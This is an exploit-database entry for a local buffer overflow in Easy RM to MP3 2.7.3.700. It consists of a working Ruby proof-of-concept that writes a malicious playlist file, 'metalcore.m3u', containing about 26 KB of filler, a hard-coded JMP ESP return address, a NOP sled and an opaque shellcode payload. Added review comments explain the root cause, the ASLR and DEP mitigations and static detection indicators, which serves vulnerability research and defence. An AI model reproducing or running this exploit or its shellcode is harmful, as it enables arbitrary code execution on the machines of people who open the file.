Easy RM to MP3 2.7.3.700 - Local Overflow

EDB-ID:

10642

CVE:

N/A

Author:

John Babio

Type:

local

Platform:

Windows

Published:

2009-12-24

#!/usr/bin/ruby
#
# Proof-of-concept generator for the "Easy RM to MP3 2.7.3.700 - Local
# Overflow" entry: it builds one long byte string and writes it to a
# playlist file named "metalcore.m3u". The script only creates the file.
#
# Layout of the generated file, in order:
#   [ 26109 x 0x41 filler ][ 4-byte address ][ 25 x 0x90 ][ payload bytes ]
#
# Review notes (defensive):
# - Root cause is presumably an unbounded copy of a playlist entry into a
#   fixed-size stack buffer in the player's parser; the page gives no
#   details, so confirm against the application itself. The fix belongs in
#   that parser: enforce a maximum entry length before copying.
# - The 4-byte value is a hard-coded address inside a DLL shipped with the
#   application (see the author's note below). The layout therefore assumes
#   that the module loads at the same address on every run and that stack
#   memory is executable; ASLR-enabled modules and DEP each invalidate one
#   of those assumptions.
# - Detection: a normal .m3u holds short text lines (paths or URLs). A
#   single line of roughly 26 KB of one repeated byte followed by
#   non-printable bytes is a strong static indicator for file-scanning
#   rules and mail/web gateways.

# Filler: 26109 bytes of 0x41 ('A'). The count is specific to this build of
# the application; presumably the distance to the saved return address.
breakit = "\x41" * 26109
# 0x01AAF23A stored little-endian; matches the address in the note below.
jump = "\x3a\xf2\xaa\x01"
# 25 bytes of 0x90 (x86 NOP) placed between the address and the payload.
padit = "\x90" * 25

#01AAF23A   FFE4 JMP ESP
#MSRMCcodec02.dll

# Opaque payload bytes. The page does not state what this payload does and
# nothing visible here establishes its behaviour.
# NOTE(review): identify by analysis before drawing conclusions from it.
finishhim =
"\xdd\xc5\xd9\x74\x24\xf4\x58\xbf\x27\x98\xb6\xfc\x31\xc9" +
"\xb1\x32\x31\x78\x17\x83\xe8\xfc\x03\x5f\x8b\x54\x09\x63" +
"\x43\x11\xf2\x9b\x94\x42\x7a\x7e\xa5\x50\x18\x0b\x94\x64" +
"\x6a\x59\x15\x0e\x3e\x49\xae\x62\x97\x7e\x07\xc8\xc1\xb1" +
"\x98\xfc\xcd\x1d\x5a\x9e\xb1\x5f\x8f\x40\x8b\x90\xc2\x81" +
"\xcc\xcc\x2d\xd3\x85\x9b\x9c\xc4\xa2\xd9\x1c\xe4\x64\x56" +
"\x1c\x9e\x01\xa8\xe9\x14\x0b\xf8\x42\x22\x43\xe0\xe9\x6c" +
"\x74\x11\x3d\x6f\x48\x58\x4a\x44\x3a\x5b\x9a\x94\xc3\x6a" +
"\xe2\x7b\xfa\x43\xef\x82\x3a\x63\x10\xf1\x30\x90\xad\x02" +
"\x83\xeb\x69\x86\x16\x4b\xf9\x30\xf3\x6a\x2e\xa6\x70\x60" +
"\x9b\xac\xdf\x64\x1a\x60\x54\x90\x97\x87\xbb\x11\xe3\xa3" +
"\x1f\x7a\xb7\xca\x06\x26\x16\xf2\x59\x8e\xc7\x56\x11\x3c" +
"\x13\xe0\x78\x2a\xe2\x60\x07\x13\xe4\x7a\x08\x33\x8d\x4b" +
"\x83\xdc\xca\x53\x46\x99\x2b\xa5\x5b\x37\xbb\x1c\x0e\x7a" +
"\xa1\x9e\xe4\xb8\xdc\x1c\x0d\x40\x1b\x3c\x64\x45\x67\xfa" +
"\x94\x37\xf8\x6f\x9b\xe4\xf9\xa5\xf8\x6b\x6a\x25\xff"

# Concatenate the four parts in the order shown in the layout above and
# write them to metalcore.m3u in the current working directory.
evil = breakit + jump + padit + finishhim
file=open("metalcore.m3u","w")
file.write(evil)
file.close()